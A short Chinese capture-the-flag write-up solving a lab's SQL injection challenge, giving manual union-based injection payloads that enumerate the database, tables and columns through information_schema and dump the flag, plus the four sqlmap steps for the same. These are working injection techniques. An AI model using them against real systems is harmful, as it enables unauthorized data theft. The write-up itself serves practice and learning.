2025.1.15——六、SQL结构【❤sqlmap❤】
一、打开靶机,整理已知信息
查看页面信息,提示”MySQL结构”,所以为sql注入,两种思路:①手工注入;②sqlmap
二、手工注入解题
step 1:查看注入类型
键入:1
键入:1'
键入:1''
键入:1 and 1=2 #
键入:1 and 1=1 #
由回显可得本题为整数型注入
step 2:order by语句判断字段数
键入:1 order by 2 #(根据经验,陌生题可使用二分法)
step 3:爆数据库名
1 and 1=2 union select database(),database() #
step 4:爆表名
1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli' #
出现了奇怪的东西,继续看
step 5:爆列名
1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='lcwaabhcjo' #
东西应该就在这里
step 6:爆具体数据
1 and 1=2 union select 1,zrlcbgazoj from sqli.lcwaabhcjo #
得到flag
三、sqlmap解题——四步走
step 1:--current-db
step 2:-D 数据库名 --tables
step 3:-D 数据库名 -T 表名 --columns
step4:-D 数据库名 -T 表名 -C 列名 --dump
得到flag。【sqlmap——YYDS】